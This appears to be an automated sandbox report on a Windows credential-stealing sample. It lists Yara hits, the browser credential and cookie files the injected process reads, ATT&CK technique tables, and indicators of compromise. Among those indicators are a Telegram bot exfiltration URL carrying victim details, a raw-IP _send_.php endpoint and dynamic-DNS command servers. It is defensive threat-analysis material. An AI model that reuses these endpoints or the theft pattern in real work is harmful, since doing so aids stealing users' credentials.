                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SP0npSA64a.exe PID: 6220, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: SP0npSA64a.exeBinary or memory string: WIN_XP
                  Source: SP0npSA64a.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                  Source: SP0npSA64a.exeBinary or memory string: WIN_XPe
                  Source: SP0npSA64a.exeBinary or memory string: WIN_VISTA
                  Source: SP0npSA64a.exeBinary or memory string: WIN_7
                  Source: SP0npSA64a.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SP0npSA64a.exe PID: 6220, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SP0npSA64a.exe PID: 6220, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SP0npSA64a.exe PID: 6220, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  2
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  4
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS117
                  System Information Discovery
                  Distributed Component Object Model21
                  Input Capture
                  1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  2
                  Valid Accounts
                  LSA Secrets121
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials11
                  Virtualization/Sandbox Evasion
                  VNCGUI Input Capture24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  SP0npSA64a.exe66%ReversingLabsWin32.Backdoor.FormBook
                  SP0npSA64a.exe100%AviraHEUR/AGEN.1321671
                  SP0npSA64a.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  188.114.97.3
                  truetrue
                    unknown
                    api.telegram.org
                    149.154.167.220
                    truetrue
                      unknown
                      mail.irco.com.sa
                      46.151.208.21
                      truetrue
                        unknown
                        checkip.dyndns.com
                        158.101.44.242
                        truefalse
                          unknown
                          checkip.dyndns.org
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/8.46.123.33false
                            • URL Reputation: safe
                            unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2010/10/2024%20/%2018:33:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/RegSvcs.exe, 00000002.00000002.4598521069.0000000002D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.telegram.org/botSP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                      unknown
                                      https://www.office.com/lBRegSvcs.exe, 00000002.00000002.4598521069.0000000002D2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.4598521069.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002D31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://varders.kozow.com:8081SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                unknown
                                                http://aborters.duckdns.org:8081SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  unknown
                                                  http://mail.irco.com.saRegSvcs.exe, 00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000002.00000002.4598521069.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002BFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://anotherarmy.dns.army:8081SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://checkip.dyndns.org/qSP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedSP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUtrue
                                                          46.151.208.21
                                                          mail.irco.com.saSaudi Arabia
                                                          51975NASHIRNET-ASNNASHIRNETASNSAtrue
                                                          188.114.97.3
                                                          reallyfreegeoip.orgEuropean Union
                                                          13335CLOUDFLARENETUStrue
                                                          158.101.44.242
                                                          checkip.dyndns.comUnited States
                                                          31898ORACLE-BMC-31898USfalse
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1530726
                                                          Start date and time:2024-10-10 13:17:06 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 18s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:5
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:SP0npSA64a.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:b45b6d05b6f9fc7d8e5f813ebad0961e3a1a0ed432295ba4edc10a826d0f8516.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@4/4
                                                          EGA Information:
                                                          • Successful, ratio: 50%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 54
                                                          • Number of non-executed functions: 299
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.190.159.68, 20.190.159.73, 20.190.159.4, 20.190.159.0, 20.190.159.71, 20.190.159.64, 40.126.31.67, 40.126.31.69, 93.184.221.240
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                          • Execution Graph export aborted for target RegSvcs.exe, PID 7164 because it is empty
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • VT rate limit hit for: SP0npSA64a.exe
                                                          TimeTypeDescription
                                                          07:18:17API Interceptor10962785x Sleep call for process: RegSvcs.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.154.167.220ZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  ADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                    Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                                          sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                                            1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                                                              46.151.208.217DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                188.114.97.3foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                • www.bayarcepat19.click/fxts/
                                                                                RRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                • 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
                                                                                octux.exe.exeGet hashmaliciousUnknownBrowse
                                                                                • servicetelemetryserver.shop/api/index.php
                                                                                1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                                                                • www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
                                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                • www.launchdreamidea.xyz/bd77/
                                                                                http://embittermentdc.comGet hashmaliciousUnknownBrowse
                                                                                • embittermentdc.com/favicon.ico
                                                                                scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                                                • paste.ee/d/gvOd3
                                                                                IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                • www.bayarcepat19.click/yuvr/
                                                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                • www.cc101.pro/0r21/
                                                                                http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                                • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                                158.101.44.242GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                z27PAYMENT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • checkip.dyndns.org/
                                                                                bpdv3trzkv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                RFQ 2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                pQGOxS84rW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                ixgyfGK4yl.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                z1ORDER.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • checkip.dyndns.org/
                                                                                0001047757804_092024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                reallyfreegeoip.orgGYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                ADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                SecuriteInfo.com.Win32.DropperX-gen.28977.28876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.96.3
